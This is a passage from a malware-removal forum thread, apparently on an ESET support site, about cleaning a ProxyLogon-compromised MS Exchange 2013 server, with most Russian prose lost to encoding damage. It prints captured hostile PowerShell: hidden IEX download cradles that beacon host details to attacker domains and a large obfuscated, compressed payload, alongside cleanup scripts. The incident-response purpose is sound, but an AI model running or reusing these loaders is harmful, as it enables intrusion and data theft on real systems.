�� esetnod32.ru [��: �� MS Exchange 2013]

�� MS Exchange 2013

Thu, 18 Mar 2021 16:49:17 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� Microsoft Exchange Server

====quote====
�� (CISA) �� Microsoft Exchange Server. �� , �� , �� Exchange Server, �� , � �� , �� . �� . Microsoft �� Microsoft Exchange Server. �� Microsoft Exchange �, �� , �� Exchange Online �� Microsoft 365 (�� O365).

�� , �� (TTP), �� (IOC), �� . �� , CISA �� TTP � �� IOC �� . �� , �� . �� , �� , �� .

=============
�� :
https://us-cert.cisa.gov/ncas/alerts/aa21-062a
18.03.2021 16:49:17, santy.

�� MS Exchange 2013

Thu, 18 Mar 2021 07:27:19 +0300

�� MS Exchange 2013 ProxyLogon � �� .
��, �� powershell(�� : SPHVMAIL01), �� .

====quote====
�� C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
�� POWERSHELL.EXE

��. �� , �� Microsoft Windows

�� PowerShell.EXE.MUI
�� 6.3.9600.17396 (winblue_r4.141007-2030)
�� Windows PowerShell
�� Microsoft Corporation

��. ��
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
SHA1 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B
MD5 C031E215B8B08C752BF362F6D4C5D3AD

��
�� C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT

�� C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW

�� C:\WINDOWS\SYSTEM32\TASKS\JCA9PD

�� C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZY4OWX

�� C:\WINDOWS\SYSTEM32\TASKS\O6YM9I

�� C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN

=============

18.03.2021 07:27:19, santy.

�� MS Exchange 2013

Thu, 18 Mar 2021 04:53:31 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
santy ��:
[QUOTE] �� :
�� ? �� "��" �� ?
=============
� �� . �� ProxyLogon, �� , �� , �� Microsoft. (��, �� , �� )

====quote====
�� Microsoft Exchange, �� , �� , �� .

ESET ��, �� 10 �� APT �� . �� , � � �� Mikroceen � Tonto Team, �� .

�� , �� Opera� Cobalt Strike, �� Microsoft Exchange �� Cobalt Strike, �� Ransomware.

� �� ESET ��, �� -��, �� IIS�. ��, �� DLTMiner [1, 2], �� , �� , �� ProxyLogon.
=============

====quote====
��-�� Mandiant �� , �� , ��, �� ProxyLogon, �� , �� .

�� . � ��, �� , �� , - �� .
=============

�� , ��
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
18.03.2021 04:53:31, santy.

�� MS Exchange 2013

Thu, 18 Mar 2021 04:44:05 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
�� :
�� . �� . �� (��. ��)
=============

�� ?
18.03.2021 04:44:05, santy.

�� MS Exchange 2013

Thu, 18 Mar 2021 04:37:50 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
�� :
�� ? �� "��" �� ?
=============

� �� . �� ProxyLogon, �� , �� , �� Microsoft. (��, �� , �� )

====quote====
�� Microsoft Exchange, �� , �� , �� .

ESET ��, �� 10 �� APT �� . �� , � � �� Mikroceen � Tonto Team, �� .

�� , �� Opera� Cobalt Strike, �� Microsoft Exchange �� Cobalt Strike, �� Ransomware.

� �� ESET ��, �� -��, �� IIS�. ��, �� DLTMiner [1, 2], �� , �� , �� ProxyLogon.

=============

�� , ��
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
18.03.2021 04:37:50, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 18:22:27 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
santy ��:
��
=============
��, �� . �� virustotal.com �� . ��, � ��
17.03.2021 18:22:27, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 18:20:14 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
�� :
�� 39 �� , ��.�� . �� . �� (��. ��)
=============

uVS - ��-��. �� 39 � �� .

��
17.03.2021 18:20:14, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 18:15:38 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
santy ��:
�� ,
�� uVS �� 39, �� , �� uVS �� , �� ,
�� , �� .
(�� , ��, �� )

=============
�� 39 �� , ��.
�� . �� . �� (��. ��)

17.03.2021 18:15:38, �� .

�� MS Exchange 2013

Wed, 17 Mar 2021 17:58:21 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� ,
�� uVS �� 39, �� , �� uVS �� , �� ,
�� , �� .
(�� , ��, �� )

[FILE ID=118952]

17.03.2021 17:58:21, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:54:46 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� :

�� uVS:
- �� ;
- �� uVS(start.exe), �� : �� , �� - �� - �� ;
- �� ;
====code====


;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
apply

QUIT

=============
�� , �� .
------------
17.03.2021 17:54:46, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:52:53 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
santy ��:

====quote====
�� :

====quote====
santy ��:

====quote====
�� :
�� .
=============
��
=============

=============
�� :
�� ?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/";
=============
��, �� .
17.03.2021 17:52:53, �� .

�� MS Exchange 2013

Wed, 17 Mar 2021 17:50:43 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
�� :

====quote====
santy ��:

====quote====
�� :
�� .
=============
��
=============

=============

�� :
�� ?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"
17.03.2021 17:50:43, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:45:03 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
santy ��:

====quote====
�� :
�� .
=============
��
=============

IZTVMAIL01_2021-03-17_16-52-35_v4.11.6.7z
17.03.2021 17:45:03, �� .

�� MS Exchange 2013

Wed, 17 Mar 2021 17:37:31 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
�� :
�� .
=============

��
17.03.2021 17:37:31, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:33:02 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� uVS �� , �� : �� 

====code====

 ;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT

apply

QUIT

=============
17.03.2021 17:33:02, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:32:08 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
santy ��:
�� (��)?
=============
�� .

====quote====
santy ��:

====quote====
�� :
�� ? �� "��" �� ?
=============
�� . ��, �� , ��
=============
�� ? �� . �� , �� (�� ). �� .

====quote====
santy ��:
�� , �� .

====quote====
C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
=============

=============
�� "��" �� ))) �� , ��, � �� .
17.03.2021 17:32:08, �� .

�� MS Exchange 2013

Wed, 17 Mar 2021 17:30:04 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� Microsoft Exchange �� , � � �� .

�� , �� ProxyLogon, �� , �� Microsoft �� , �� .

�� , �� . ��, Ransomware � �� ProxyLogon.

� �� PoC � �� Microsoft Exchange �� , � �� -�� .

https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
17.03.2021 17:30:04, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:24:49 +0300

�� MS Exchange 2013 ProxyLogon � �� .

====quote====
�� :
�� ? �� "��" �� ?
=============
�� . ��, �� , ��

�� , ��
[FILE ID=118960]

�� , �� . �� , �� , �� Active Directory, �� .

�� , � �� .

17.03.2021 17:24:49, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:23:44 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� (��)?
17.03.2021 17:23:44, santy.

�� MS Exchange 2013

Wed, 17 Mar 2021 17:14:21 +0300

�� MS Exchange 2013 ProxyLogon � �� .
�� ~~http://t.netcatkit.com/a.jsp?_20210317~~? :

��
I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('ad59f973db46acfed9fe2b588e12919548ebb21d3ba369555fd16b7c3ccb49dab15c85225712235e5d52b6d5d8ff7b3f60495d71dbbc99a79b4b2c168be303b0f247c66d37caae32797778d8f3ff129a25fed4de985f4b7ebad76a97323913cfdbdb257f34f4a3b6ee8f6c7ceb3c107abb6d5db4f65b07bb9e531f366b43cfa98956a3f6e6c075f6466e6d7fb8d720d2a9e4b95359cc9d4a9edb745b6e4decefbea9d7dcdac873446358abef3586adc648d45a4e0da4108f0531bf6e6f6f9542e613eee57c30c07c5ab55a7de81cbc715a8dd6c81bee356bad7da7d1744607fbc2dd3d203e201de793c7cbd9639eee1c34eac3dd66c3dbf51acd03d1721a62bf2e76476f769bf5835dd7032d34309a456ee6c79146938c92c712ddf6843b937e36b78fe43cc9e2b17492c9dc3e3fde85368fa470326198f6511c26b34cbc73d2094d7c1ac5b8e34ebe96824abb34b06fe25e26fd686c941f1b65134b6d4991cd64a495828d9545262327044bacade1519289934ddafad161ff931f79f143daefcdd34c84cd463190c40f42a6131104fd8f759b54c11305f149b5b636767d4d577cfa3fea9ad58ddc60e609ed475b3cc2174e1ed5e5920d8d2f7730b089118464ae1954433ce90b6e75699ffa818026ae85e37582e097792652a3586d9da56e9a8a49ceda50226a3ed4a0842d36cd2b618541fbfbd651d317fce9415ec5b292af33af55e6f4282cc07397b7f28d16fbe5bb6deb4bec47c6ad3b71e4eddd9dd17a63dbbbfb95bd5ddb3ea8550ef66dbbde68984f6722b3ae1dd824d4aca37816659ab1573196a3e6ab3dd3d42a9aceda500bb87132b77cd87361a20da52dc6f34d3ec5b3cc8a66011c27dfe70f0674915944b4496c22c8d50ef40db6f9fe3694403020d584c21331123010544b01c522bef2d8d6abfcdadecee41c8eaed0e2bf0c26a2fbc32c4cfa0a6d20e0b3eb647033acacd870bc7f3717828b17982809bf9b0ba3d71a1bec1aa1150d663280b7eb932c4b0e777668c84eff0c229181d276e350e1d70f25d041d5f86c17b499ada8a6be2224d5ba70fc9c25d1da6912f899a1efe8e66dcdb61b77ec66b8a4e51321433f03a5b144a02b6088eb274e60e7a1bf18b8fb17a2ae27a20c77a000f8e2d14cc2c299619a7637ed46d77120fe6d855f667e9029b23b4def78a11ff969269d2c963ac20d5b0a93018731f6440a3dba3cbffa7073727dd1393fc1fdf1ccf768137027eb21f4e3e117e1661a98371b831c34a502b42b197b333733ed0f1fbac798193a2e4da4f0f914fa97ab132f44f610cb69c773124c3f8aa3913f9e412642d027ed6122a4d008b8fc04be3c0c840794fb5f6017253ad33e775cc7f3a4485310a722005f2b97cb1af932cdb43a968fd3e1b7cb5b6ee0609a92e21226c29ad158c94fda88096f69aa7d04d1208e2d451238ae30f473df95711a8f780fa4598d82c7ace803bdc2333e223c31035c66a990853a3ff416aa048238c0ca6f847a6069c810a4cc5409631f33357183206c9e5bfa4e132782239cca383cf783c04f851b475e6adc62315fc65108dfc0fd1bdf9d3284ada4b2819dc59913e433d89f1dc9c67dc9461f7d4fc4304d26e32010d2e42cb2bd3d8613e414579379eabb4e702ec258ce618b575f4b613a0bc1b1f6ac7d056ad345058a18903a1d170eaa3dbf2d85226cf3bd9dfad950453c6947faf7b44be35669c046d81fd358371ac5caf5f93235cc351fe9a6840a73cd02446b06063af78e1f90d79c4a217a581639720c9fa8355a664e4564ccec669ea86a4abfc626ee69960ea25832a70d92dc6b81339b6c4e63193af02ea6ba39ed6df258bd7fdab9693608abb08bc234447801f50246eed8a1d65687d910b1547d9844f06c2a9879d297705762d7c89c3029cc798cba46b33ee42bebaf52ddb47bb361cea8563d80bb2bcddf5e8b11c510797b274d45380c086adec78ef7c9cf26578ecc7c2720f10c5d458afd490ced93c74c44e4f0e04c9133fc424b5f8807ab702310f55ce92799dd13122cfcbf38c2edff71ee1d75a31827f73a16881a75a5181846243e3f50647f26764063fb410cddcf810f17376d9dc03c80906a4bba51ce81bbded8b76b78d60f5bcdbdbd839dfa0e5c2d74e4bc4cf54529bc6f93b0f6fd225c433f5143888b2857849fd08d89543726280b0115640904902a26ca5514826b690b55610f9a3f4faea418c13d23f2bc633f25af828f0664a3f338f201bd1098406aabe3791bf45ccd916057540eb887fdffa092b14b400842c00897972a7c96e5e515150e3d2e2fef515e6ed427aa8cf8ff5d212f41508e2cf483246b28b8b1e08f2e0a9db39bdf9e2e3e768fbb9da7b393d3cbeba313ae76fc346ad75f9c70ed0090a2a7cef9714ee8306109f65cc9c53f2117d7ef28ff3ad209d3f6cf46e9bebacc72554e68554a4e7918bda66cbd9dc270410c7129051585c54a5d9f66895142eb5014a10fc8b6c29a2030351a26d3670814abd09645158b3261e8a93abd23c73342e7f7c8bf9abee3f2c4cdc6c545d9ebc61ee40c21e528e216c6280b77126be50adfaa94dfe69d5db98ca1d0abe09b86e0c5b9e018e9e3d62852b78a4a484d28aef8de46cb840830bfdee651fe7f6f9c68fa32dfa41bad13f54e8899b745cd9a3ec3c8cbd2977600bb82c7a05d88f00fa51f9322912c3a0c9ef5967a061a03ce2a0d815d14cf12f8092df5035fa825da402a800b9086c105d04ea07654804b812d9e9339e807971adbc9d5fa13be9587911a214bb61484e5c85684f876379fc87dd6b6433e1a99cf02e9794de85599d52e73e3f34e9fcbe6a242293f0192fef8e38fa7d5b1d76aec7519d0b7e66809f6354244544b1416b99bc17410a65dc31a9a15c0b5b1205011658455c758a55d37bf924c18be2df9779cd06a8f3544c510369f3e3fbff53f8b478303ab68b69818d531e8a1266af057930454f28b1f019cc9be42aede5a2a8d7c8cca3d02e6b3bffc040e259c702dd92c895535a2480cd6ea2df654a99bb6cd82abfd9877a65955bdc52af795dfe7083558ea18d5921a3351719394ca66f59a7aa83d0ddaf4691f057184a0a012672d18cb15bdcfdab601fd3a07de7ffa0458549975c530ead4a0eebfd4a0420cd37c4b4154d7acab139eabd1b4ef778c8afec43ea059da6b80950664a2a656db996baf20feaba5e46bd78469af374736e12c19c28173ff22d82c773f9ffcf6ad7f984f0827a2ab9435abbc098930047c35303572d2b26a1001d501852262b28d4f27156f57bce16602eb7b001dfb1cd8f4886844e7502d97cf8278e8047df17e657ab95cbd45debb5be3b9c8ec4a18c6dd7a9b45d1f4ee08dbc4461e293e30ae8ec0787a77c491846c81ea10609e5310b6313a70d36c560c280627439c25a92851f96ee5148d66358af56ecef92c6cb96203578b257197e76c2eda40fdcd6b528bcd4b3aeaf7eac25b58b948b6c8bc5cb55266cd2bdc0d899a2b128dd7456a6e88347e51a626245030c9477d0ba9e8e205b1784eab58f457b9a6f6d68ada7f952fa9bda5a9534cfafa27b573e1b6d1dce64da26acb507652d1efa85615bebad2aaa2db0c30a82ddad436f919ea6cb42a173d14b7a8317bc291eee45212b8fd6c94dfd8fc44f01dd8fc4451ba52c6e729a58daaa40272f495553afabd634354b9b1ace67d24bea94100c2a14842b920c29c541d3c54a11a763ac2deddfc6442376998dce2db5156d5c6308a65bc7d00114a612ccf9d6875d96c54f59addd217851454ba08db5ef7e437f4801acc820e02504c47b1aa54bfa37a6d7b8beccc65f3d656890a7b4ebde821fe2531934b9546c817417eae439cf40a8abe8a9eeb8edc52b1c5f70a63fb1d2798d4465237f40f50a4d519631c4dfc7b648cc83a9eb9530bad3c5f0de86a09967dd8cbe2f6616beb595b980bfc91180643065db4b9cbc5f4e3bc80401be6e840af5c66e6b055a2191d299d3975f57922b8118f997d12c171494587879dde51b76b03f1f3f269b99462b2450a5e72a2a0594a86171b405f1c59ed6033b1ccec2f694205afd290021d38f246b0475e5b8fee3d1bb9964fe1236fdc5e1eb7e1ced8466544b7368e2f8932ef7d295775e95c94c7ec404463105891d01a8d5a73f7600f7f60d046d6bbbccd426ca1484a9250e4a214d377c017c65b1e02e29235b35a16204b864585c01d4f27419ba0ca7c935b6e3e20a0936ce642f56c327f872668f57831f270ee5eadef317b3e2810f9d6564816a8b57208599a4cd3b6feeed793df07ef2f8f3aef07e79da377dd8b937eeff2f4e653e7faa44f7fb58469dc5e1e2ff52f4723dfa54c5a7a203b7c8a1ff65acdc605008da95d19e2df046c627a135fcfa2fef5c959b77773fd7b7fc11b4c1e1ca9a8c92ad404e9240aad442aa39fe0bd7a899f7d62fde258414bf15d1cfdb3b909b5790532e55a317f2dc674cc383f3c6402ba4f20eb4efcc0e3d3f20d0238068cf1c4c73af9611e0e7716bd5fdfabe08f0f3e74b9a135b8b3da60d12f0dfa97b32c88e3a9f9bce842f2bf01d2a998b771c8f34f33fa45b3b370eae53a3c192d27599f7c4b999e0695cdb9eba741347f005f1c72f14d4d391ed591c1d98c3ad9866665749a748c8c42fe520a51b98cdb2be1a3983e3fe70501dfe7859755cf394eb7bebfe4c92b1e2e7868e65ab143032bd96799c0f906ef7733be0b871fc75e88b39a969d3d66b96ab672c4294274c71f0d90a882e2bf3c56d5a2de7891eb74da9a4eed201e2b969b0ca1c99cd9f3f6df'-split'(..)'\|?{$_}\|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

��

I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('ad59f973db46acfed9fe2b588e12919548ebb21d3ba369555fd16b7c3ccb49dab15c85225712235e5d52b6d5d8ff7b3f60495d71dbbc99a79b4b2c168be303b0f247c66d37caae32797778d8f3ff129a25fed4de985f4b7ebad76a97323913cfdbdb257f34f4a3b6ee8f6c7ceb3c107abb6d5db4f65b07bb9e531f366b43cfa98956a3f6e6c075f6466e6d7fb8d720d2a9e4b95359cc9d4a9edb745b6e4decefbea9d7dcdac873446358abef3586adc648d45a4e0da4108f0531bf6e6f6f9542e613eee57c30c07c5ab55a7de81cbc715a8dd6c81bee356bad7da7d1744607fbc2dd3d203e201de793c7cbd9639eee1c34eac3dd66c3dbf51acd03d1721a62bf2e76476f769bf5835dd7032d34309a456ee6c79146938c92c712ddf6843b937e36b78fe43cc9e2b17492c9dc3e3fde85368fa470326198f6511c26b34cbc73d2094d7c1ac5b8e34ebe96824abb34b06fe25e26fd686c941f1b65134b6d4991cd64a495828d9545262327044bacade1519289934ddafad161ff931f79f143daefcdd34c84cd463190c40f42a6131104fd8f759b54c11305f149b5b636767d4d577cfa3fea9ad58ddc60e609ed475b3cc2174e1ed5e5920d8d2f7730b089118464ae1954433ce90b6e75699ffa818026ae85e37582e097792652a3586d9da56e9a8a49ceda50226a3ed4a0842d36cd2b618541fbfbd651d317fce9415ec5b292af33af55e6f4282cc07397b7f28d16fbe5bb6deb4bec47c6ad3b71e4eddd9dd17a63dbbbfb95bd5ddb3ea8550ef66dbbde68984f6722b3ae1dd824d4aca37816659ab1573196a3e6ab3dd3d42a9aceda500bb87132b77cd87361a20da52dc6f34d3ec5b3cc8a66011c27dfe70f0674915944b4496c22c8d50ef40db6f9fe3694403020d584c21331123010544b01c522bef2d8d6abfcdadecee41c8eaed0e2bf0c26a2fbc32c4cfa0a6d20e0b3eb647033acacd870bc7f3717828b17982809bf9b0ba3d71a1bec1aa1150d663280b7eb932c4b0e777668c84eff0c229181d276e350e1d70f25d041d5f86c17b499ada8a6be2224d5ba70fc9c25d1da6912f899a1efe8e66dcdb61b77ec66b8a4e51321433f03a5b144a02b6088eb274e60e7a1bf18b8fb17a2ae27a20c77a000f8e2d14cc2c299619a7637ed46d77120fe6d855f667e9029b23b4def78a11ff969269d2c963ac20d5b0a93018731f6440a3dba3cbffa7073727dd1393fc1fdf1ccf768137027eb21f4e3e117e1661a98371b831c34a502b42b197b333733ed0f1fbac798193a2e4da4f0f914fa97ab132f44f610cb69c773124c3f8aa3913f9e412642d027ed6122a4d008b8fc04be3c0c840794fb5f6017253ad33e775cc7f3a4485310a722005f2b97cb1af932cdb43a968fd3e1b7cb5b6ee0609a92e21226c29ad158c94fda88096f69aa7d04d1208e2d451238ae30f473df95711a8f780fa4598d82c7ace803bdc2333e223c31035c66a990853a3ff416aa048238c0ca6f847a6069c810a4cc5409631f33357183206c9e5bfa4e132782239cca383cf783c04f851b475e6adc62315fc65108dfc0fd1bdf9d3284ada4b2819dc59913e433d89f1dc9c67dc9461f7d4fc4304d26e32010d2e42cb2bd3d8613e414579379eabb4e702ec258ce618b575f4b613a0bc1b1f6ac7d056ad345058a18903a1d170eaa3dbf2d85226cf3bd9dfad950453c6947faf7b44be35669c046d81fd358371ac5caf5f93235cc351fe9a6840a73cd02446b06063af78e1f90d79c4a217a581639720c9fa8355a664e4564ccec669ea86a4abfc626ee69960ea25832a70d92dc6b81339b6c4e63193af02ea6ba39ed6df258bd7fdab9693608abb08bc234447801f50246eed8a1d65687d910b1547d9844f06c2a9879d297705762d7c89c3029cc798cba46b33ee42bebaf52ddb47bb361cea8563d80bb2bcddf5e8b11c510797b274d45380c086adec78ef7c9cf26578ecc7c2720f10c5d458afd490ced93c74c44e4f0e04c9133fc424b5f8807ab702310f55ce92799dd13122cfcbf38c2edff71ee1d75a31827f73a16881a75a5181846243e3f50647f26764063fb410cddcf810f17376d9dc03c80906a4bba51ce81bbded8b76b78d60f5bcdbdbd839dfa0e5c2d74e4bc4cf54529bc6f93b0f6fd225c433f5143888b2857849fd08d89543726280b0115640904902a26ca5514826b690b55610f9a3f4faea418c13d23f2bc633f25af828f0664a3f338f201bd1098406aabe3791bf45ccd916057540eb887fdffa092b14b400842c00897972a7c96e5e515150e3d2e2fef515e6ed427aa8cf8ff5d212f41508e2cf483246b28b8b1e08f2e0a9db39bdf9e2e3e768fbb9da7b393d3cbeba313ae76fc346ad75f9c70ed0090a2a7cef9714ee8306109f65cc9c53f2117d7ef28ff3ad209d3f6cf46e9bebacc72554e68554a4e7918bda66cbd9dc270410c7129051585c54a5d9f66895142eb5014a10fc8b6c29a2030351a26d3670814abd09645158b3261e8a93abd23c73342e7f7c8bf9abee3f2c4cdc6c545d9ebc61ee40c21e528e216c6280b77126be50adfaa94dfe69d5db98ca1d0abe09b86e0c5b9e018e9e3d62852b78a4a484d28aef8de46cb840830bfdee651fe7f6f9c68fa32dfa41bad13f54e8899b745cd9a3ec3c8cbd2977600bb82c7a05d88f00fa51f9322912c3a0c9ef5967a061a03ce2a0d815d14cf12f8092df5035fa825da402a800b9086c105d04ea07654804b812d9e9339e807971adbc9d5fa13be9587911a214bb61484e5c85684f876379fc87dd6b6433e1a99cf02e9794de85599d52e73e3f34e9fcbe6a242293f0192fef8e38fa7d5b1d76aec7519d0b7e66809f6354244544b1416b99bc17410a65dc31a9a15c0b5b1205011658455c758a55d37bf924c18be2df9779cd06a8f3544c510369f3e3fbff53f8b478303ab68b69818d531e8a1266af057930454f28b1f019cc9be42aede5a2a8d7c8cca3d02e6b3bffc040e259c702dd92c895535a2480cd6ea2df654a99bb6cd82abfd9877a65955bdc52af795dfe7083558ea18d5921a3351719394ca66f59a7aa83d0ddaf4691f057184a0a012672d18cb15bdcfdab601fd3a07de7ffa0458549975c530ead4a0eebfd4a0420cd37c4b4154d7acab139eabd1b4ef778c8afec43ea059da6b80950664a2a656db996baf20feaba5e46bd78469af374736e12c19c28173ff22d82c773f9ffcf6ad